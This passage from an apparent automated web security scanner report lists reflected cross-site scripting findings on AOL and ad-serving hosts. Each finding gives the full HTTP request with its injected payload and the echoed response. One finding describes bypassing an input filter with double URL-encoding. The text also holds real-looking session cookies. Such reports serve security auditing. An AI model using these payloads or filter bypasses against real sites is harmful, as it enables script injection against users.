Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:37 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s2; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=72f789d<script>alert(1)</script>2df104e1cea&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...

5.10. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://about.aol.com
Path:	/aolnetwork/aol_pp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d43fe"%3bbb310a036eb was submitted in the REST URL parameter 1. This input was echoed as d43fe";bb310a036eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /aolnetworkd43fe"%3bbb310a036eb/aol_pp HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617329219-Repeat%7C1367689329219%3B%20s_nrgvo%3DRepeat%7C1367689329221%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:41:22 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10535
set-cookie: dcisid=2899132428.408601165.4098949120; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...

...[SNIP]...

5.11. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://about.aol.com
Path:	/aolnetwork/aol_pp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f70b"%3b4d061b326ea was submitted in the REST URL parameter 2. This input was echoed as 6f70b";4d061b326ea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /aolnetwork/6f70b"%3b4d061b326ea HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617329219-Repeat%7C1367689329219%3B%20s_nrgvo%3DRepeat%7C1367689329221%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:41:38 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10521
set-cookie: dcisid=2899066892.3445211725.257032192; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...

...[SNIP]...

5.12. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://about.aol.com
Path:	/aolnetwork/aolcom_terms

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90851"%3b5cfb0851bbb was submitted in the REST URL parameter 1. This input was echoed as 90851";5cfb0851bbb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /aolnetwork90851"%3b5cfb0851bbb/aolcom_terms HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:42:16 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10547
set-cookie: dcisid=3360935356.688962381.1219365888; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...

...[SNIP]...

5.13. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://about.aol.com
Path:	/aolnetwork/aolcom_terms

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0463"%3bf8dd5e0d644 was submitted in the REST URL parameter 2. This input was echoed as f0463";f8dd5e0d644 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /aolnetwork/f0463"%3bf8dd5e0d644 HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:42:20 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10521
set-cookie: dcisid=2898935820.660193869.2622619648; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...

...[SNIP]...

5.14. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://about.aol.com
Path:	/aolnetwork/copyright_infringement

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46a8e"%3b36d39e4ac68 was submitted in the REST URL parameter 1. This input was echoed as 46a8e";36d39e4ac68 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /aolnetwork46a8e"%3b36d39e4ac68/copyright_infringement HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617329219-Repeat%7C1367689329219%3B%20s_nrgvo%3DRepeat%7C1367689329221%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:41:24 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10567
set-cookie: dcisid=2899132428.408601165.4199612416; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...

...[SNIP]...

5.15. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://about.aol.com
Path:	/aolnetwork/copyright_infringement

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9271e"%3be315bc2c006 was submitted in the REST URL parameter 2. This input was echoed as 9271e";e315bc2c006 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /aolnetwork/9271e"%3be315bc2c006 HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617329219-Repeat%7C1367689329219%3B%20s_nrgvo%3DRepeat%7C1367689329221%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:42:23 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10521
set-cookie: dcisid=3361000892.722516813.2628455424; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...

...[SNIP]...

5.16. https://account.login.aol.com/_cqr/opr/opr.psp [authLev parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://account.login.aol.com
Path:	/_cqr/opr/opr.psp

Issue detail

The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bfe9%2522%253b0e2921fad4a was submitted in the authLev parameter. This input was echoed as 7bfe9";0e2921fad4a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the authLev request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /_cqr/opr/opr.psp?sitedomain=bill.aol.com&authLev=S7bfe9%2522%253b0e2921fad4a&siteState=OrigUrl%3Dhttps%253A%252F%252Fbill.aol.com%252FSPortal%252Fjsp%252Fmain.jsp&lang=en&locale=us HTTP/1.1
Host: account.login.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617350589-Repeat%7C1367689350589%3B%20s_nrgvo%3DRepeat%7C1367689350591%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:43:36 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: OPR_SC=diAxLjAga2lkIDAgUWtnaFZheXBieUMzVFM2TUwrK29JaTIzd1pRPQ%3D%3D-NcFbxVvZ3cH4d3%2Bx%2BogHkrjcziFFwz%2Bb; Domain=account.login.aol.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 2894

...[SNIP]...
fxID="sso";
s_265.pageName="sso : badbrowser";
s_265.channel="us.snssignin";
s_265.prop1='ssologin';
s_265.prop12="/opr/badbrowser.jsp";
s_265.prop15="bm9uZQ%3D%3D";
s_265.prop17="std";
s_265.prop18="S7bfe9";0e2921fad4a";
s_265.prop19="vl6";
s_265.prop20="en-us";
var s_code=s_265.t();
if(s_code)document.write(s_code);
//-->
...[SNIP]...

5.17. https://account.login.aol.com/opr/_cqr/opr/opr.psp [authLev parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://account.login.aol.com
Path:	/opr/_cqr/opr/opr.psp

Issue detail

The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4481%2522%253bea66b28391e was submitted in the authLev parameter. This input was echoed as f4481";ea66b28391e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /opr/_cqr/opr/opr.psp?sitedomain=bill.aol.com&authLev=Sf4481%2522%253bea66b28391e&siteState=OrigUrl%3Dhttps%253A%252F%252Fbill.aol.com%252FSPortal%252Fjsp%252Fmain.jsp&lang=en&locale=us HTTP/1.1
Host: account.login.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:44:15 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: OPR_SC=diAxLjAga2lkIDAgUWtnaFZheXBieUMzVFM2TUwrK29JaTIzd1pRPQ%3D%3D-NcFbxVvZ3cH4d3%2Bx%2BogHkrjcziFFwz%2Bb; Domain=account.login.aol.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 2894

...[SNIP]...
fxID="sso";
s_265.pageName="sso : badbrowser";
s_265.channel="us.snssignin";
s_265.prop1='ssologin';
s_265.prop12="/opr/badbrowser.jsp";
s_265.prop15="bm9uZQ%3D%3D";
s_265.prop17="std";
s_265.prop18="Sf4481";ea66b28391e";
s_265.prop19="vl6";
s_265.prop20="en-us";
var s_code=s_265.t();
if(s_code)document.write(s_code);
//-->
...[SNIP]...

5.18. http://ad.doubleclick.net/adj/huffpost.premium/front [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/huffpost.premium/front

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20afb'-alert(1)-'1fde27dc36e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/huffpost.premium/front;global=1;cap_12=n;;plat=win;br=ch;bv=11;subbv=0;load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418%7Chomepage%7Cpushdown%7C%7C%7C%7C%7C%7C%7C%7C;sz=970x418;tile=1;ord=18505141?&20afb'-alert(1)-'1fde27dc36e=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 05 May 2011 00:59:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 495

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3afe/0/0/%2a/g;44306;0-0;0;19141241;31519-970/418;0/0/0;u=970x418|homepage|pushdown||||||||;~okv=;global=1;cap_12=n;;plat=win;br=ch;bv=11;subbv=0;load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown||||||||;sz=970x418;tile=1;;20afb'-alert(1)-'1fde27dc36e=1;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

5.19. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.tw.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 2b6fc<script>alert(1)</script>6725a804ac9 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1505691&pid=19907672b6fc<script>alert(1)</script>6725a804ac9&ps=-1&zw=627&zh=195&url=http%3A//www.dailyfinance.com/%3Ficid%3Dnavbar_finance_main5&v=5&dct=Forrester%20Research%20To%20Broadcast%20Its%20First-Quarter%20-gs%20Conference%20Call%20Via%20The%20Internet%20-%20DailyFinance HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C53380%7C60490%7C52615%7C60491%7C50507%7C53656%7C55401%7C60506%7C57094%7C51182%7C56673%7C54057%7C56969%7C56835%7C56780%7C50212%7C56987%7C50221%7C50216%7C53575%7C50280%7C60190%7C60183_Mon%2C%2002%20May%202011%2023%3A18%3A39%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:20 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510

           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>


                                           java.lang.NumberFormatException: For input string: "19907672b6fc<script>alert(1)</script>6725a804ac9"


                                                           </head>
...[SNIP]...

5.20. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.tw.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 1fb20--><script>alert(1)</script>e17c77c9e55 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=15056911fb20--><script>alert(1)</script>e17c77c9e55&pid=1990767&ps=-1&zw=627&zh=195&url=http%3A//www.dailyfinance.com/%3Ficid%3Dnavbar_finance_main5&v=5&dct=Forrester%20Research%20To%20Broadcast%20Its%20First-Quarter%20-gs%20Conference%20Call%20Via%20The%20Internet%20-%20DailyFinance HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C53380%7C60490%7C52615%7C60491%7C50507%7C53656%7C55401%7C60506%7C57094%7C51182%7C56673%7C54057%7C56969%7C56835%7C56780%7C50212%7C56987%7C50221%7C50216%7C53575%7C50280%7C60190%7C60183_Mon%2C%2002%20May%202011%2023%3A18%3A39%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:18 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3306

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <script>alert(1)</script>e17c77c9e55" -->
...[SNIP]...

5.21. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.tw.adsonar.com
Path:	/adserving/getAds.jsp

